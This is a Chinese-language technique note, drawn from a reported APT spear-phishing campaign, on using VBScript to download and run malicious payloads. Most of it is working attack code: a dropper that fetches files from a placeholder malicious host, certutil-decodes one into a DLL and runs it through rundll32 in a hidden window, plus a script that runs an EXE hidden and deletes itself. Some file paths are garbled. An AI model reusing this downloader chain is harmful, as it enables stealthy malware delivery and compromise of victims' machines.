利用VBS下载EXE文件手法记录

1、信息来源

疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

https://twitter.com/blackorbird/status/1082553543280680962

2、利用思路

1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下，通过【powershell Invoke-item】运行。
2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat
3、 certutil -f –decode 强制覆盖文件、base64解码改名为dll
4、 通过powershell运行rundl32加载svchow.dll中的MyRTLCreateFunction函数运行恶意代码。

3、实例代码

下载代码：

Set wshShell = CreateObject("Wscript.shell")
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "
ote.png"
with bStrm
	.type = 1 '//binary
	.open
	.write xHttp.responseBody
	.savetofile docPath, 2 '//overwrite
end With

CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "
ote.png'", 0, true

docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send

with bStrm2
	.type = 1 '//binary
	.open
	.write xHttp2.responseBody
	.savetofile dir + "svchow.dat", 2 '//overwrite
end With
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "svchow.dat, " & dir & "svchow.dll",0,true
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "svchow.dll,MyRTLCreateFunction",0,true

转码运行exe：

Dim fIn, fOut, sFilename, sBOM
sFilename = "C:windows	empxxx.exe"

Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename

sBOM = fIn.Read(5)
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
If AscB(MidB(sBOM, 1, 1)) = 255 _
        And AscB(MidB(sBOM, 2, 1)) = 254 Then
    
    fIn.Position = 2 ' Skip BOM

    Set fOut = CreateObject("adodb.stream")
    fOut.Type = 1 'adTypeBinary
    fOut.Mode = adModeReadWrite
    fOut.Open

    fIn.CopyTo fOut

    fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
    fOut.Flush
    fOut.Close

	Set shell = CreateObject("Wscript.Shell")
	shell.Run "c:windows	empxxx.exe",0,False
	
	Set fso = CreateObject("Scripting.FileSystemObject") 
	fso.DeleteFile(WScript.ScriptName) 
End If